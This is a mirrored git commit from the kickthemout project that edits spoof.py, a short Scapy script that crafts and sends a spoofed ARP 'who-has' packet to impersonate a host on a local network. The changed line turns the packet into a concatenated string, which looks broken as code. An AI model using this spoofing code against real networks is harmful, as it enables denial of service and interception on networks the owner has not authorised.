mirror of
https://github.com/k4m4/kickthemout.git
synced 2024-11-25 14:34:23 +01:00
Update spoof.py
This commit is contained in:
parent
71515f8151
commit
2c6f57b030
2
spoof.py
2
spoof.py
@ -27,5 +27,5 @@ impersonation = # IMPERSONATION MAC
|
|||||||
|
|
||||||
# CRAFT & SEND PACKET
|
# CRAFT & SEND PACKET
|
||||||
|
|
||||||
packet = Ether()/ARP(op="who-has", hwsrc=my_mac, psrc=impersonation, pdst=target)
|
packet = 'Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op="who-has", hwsrc='+my_mac+', psrc='+impersonation+', pdst='+target+')'
|
||||||
sendp(packet)
|
sendp(packet)
|
||||||
|
Loading…
Reference in New Issue
Block a user